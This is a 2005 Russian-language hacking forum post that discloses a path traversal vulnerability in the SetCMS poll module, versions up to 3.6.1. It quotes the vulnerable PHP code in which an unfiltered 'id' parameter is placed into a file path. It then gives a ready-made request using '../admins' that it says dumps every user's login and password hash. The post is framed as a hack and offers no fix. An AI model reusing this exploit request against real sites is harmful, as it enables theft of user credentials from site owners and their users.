18.08.2005, 03:17
|
|
Умиротворенн
Регистрация: 09.12.2004
Сообщений: 996
Провел на форуме:
2386719
Репутация:
1384
|
|
Взлом SetCMS <= 3.6.1
Как я и говорил кое что более интересое чем xss
Во всех версиях SetCMS до 3.6.2 обнаружена критическая уязвимость
возможно получение всех паролей пользователей через модуль голосования
\modules\golos\index.php
ошибка в нефильтруемой переменной id
PHP код:
if ($mc == "viewvote" && isset($_GET['id']))
{
$votenum = $_GET['id'];
$file = file("files/polls/$votenum.set");
таким образом, составив такой запрос
Код:
http://target.com/SetCMS/index.php?set=golos&mc=viewrezult&id=../admins
мы получим список всех пользователей и их хэши.
(с) madnet
__________________
http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)
http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА
Последний раз редактировалось madnet; 16.01.2006 в 18:38..
|
|
|